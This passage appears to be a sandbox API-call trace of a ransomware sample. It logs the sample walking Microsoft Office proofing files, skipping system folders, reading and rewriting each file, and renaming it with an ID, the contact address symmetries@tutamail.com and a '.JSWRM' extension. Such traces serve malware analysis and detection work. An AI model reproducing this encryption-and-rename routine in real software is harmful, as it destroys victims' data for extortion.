ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSSP7FR.dub", cAlternateFileName="")) returned 1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2=".") returned 1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="..") returned 1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="...") returned 1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="windows") returned -1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="recovery") returned -1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="perflogs") returned -1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="documents and settings") returned 1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="$RECYCLE.BIN") returned 1 [0139.761] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="system volume information") returned -1 [0139.762] lstrcmpiW (lpString1="MSSP7FR.dub", lpString2="msocache") returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0139.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.dub", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7FR.dub", lpUsedDefaultChar=0x0) returned 11 [0139.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0139.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.dub", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.dub", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7FR.dub", lpUsedDefaultChar=0x0) returned 11 [0139.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0139.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0139.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0139.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7FR.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7fr.dub"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.763] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16) returned 1 [0139.763] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0139.763] ReadFile (in: hFile=0x238, lpBuffer=0x23a2a0, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23a2a0*, lpNumberOfBytesRead=0x345e89c*=0x10, lpOverlapped=0x0) returned 1 [0139.765] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.765] WriteFile (in: hFile=0x238, lpBuffer=0x23a2a0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23a2a0*, lpNumberOfBytesWritten=0x345e898*=0x10, lpOverlapped=0x0) returned 1 [0139.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0139.765] CloseHandle (hObject=0x238) returned 1 [0139.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0139.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0139.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0139.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0139.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0139.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.766] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7FR.dub" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7fr.dub"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7FR.dub.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7fr.dub.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0139.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0139.767] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc541ed37, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc541ed37, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd945950a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1c6a00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="MSSP7FR.LEX", cAlternateFileName="")) returned 1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2=".") returned 1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="..") returned 1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="...") returned 1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="windows") returned -1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="recovery") returned -1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="perflogs") returned -1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="documents and settings") returned 1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="system volume information") returned -1 [0139.767] lstrcmpiW (lpString1="MSSP7FR.LEX", lpString2="msocache") returned 1 [0139.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0139.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSSP7FR.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSSP7FR.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0139.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0139.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0139.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7fr.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.768] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1862144) returned 1 [0139.768] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.769] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.782] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.782] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.783] CloseHandle (hObject=0x238) returned 1 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0139.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0139.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0139.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0139.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0139.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0139.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0139.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0139.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7FR.LEX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7fr.lex"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\MSSP7FR.LEX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\mssp7fr.lex.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0139.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0139.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0139.791] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc39bed4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc39bed4a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd52c882e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc64c8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msspell7.dll", cAlternateFileName="")) returned 1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2=".") returned 1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="..") returned 1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="...") returned 1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="windows") returned -1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="recovery") returned -1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="perflogs") returned -1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="documents and settings") returned 1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="$RECYCLE.BIN") returned 1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="system volume information") returned -1 [0139.791] lstrcmpiW (lpString1="msspell7.dll", lpString2="msocache") returned 1 [0139.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msspell7.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msspell7.dll", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msspell7.dll", lpUsedDefaultChar=0x0) returned 12 [0139.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0139.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msspell7.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msspell7.dll", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msspell7.dll", lpUsedDefaultChar=0x0) returned 12 [0139.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0139.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0139.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.792] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefe00baf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb203a02, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x64068, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8EN.DLL", cAlternateFileName="")) returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2=".") returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="..") returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="...") returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="windows") returned -1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="recovery") returned -1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="perflogs") returned -1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="documents and settings") returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="system volume information") returned -1 [0139.792] lstrcmpiW (lpString1="msth8EN.DLL", lpString2="msocache") returned 1 [0139.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8EN.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0139.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8EN.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0139.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0139.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0139.792] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4692737, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb6a2342, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34d200, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msth8EN.LEX", cAlternateFileName="")) returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.LEX", lpString2=".") returned 1 [0139.792] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="..") returned 1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="...") returned 1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="windows") returned -1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="recovery") returned -1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="perflogs") returned -1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="documents and settings") returned 1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="$RECYCLE.BIN") returned 1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="system volume information") returned -1 [0139.793] lstrcmpiW (lpString1="msth8EN.LEX", lpString2="msocache") returned 1 [0139.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0139.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.LEX", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0139.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0139.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.LEX", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msth8EN.LEX", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msth8EN.LEX", lpUsedDefaultChar=0x0) returned 11 [0139.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0139.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0139.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0139.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0139.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 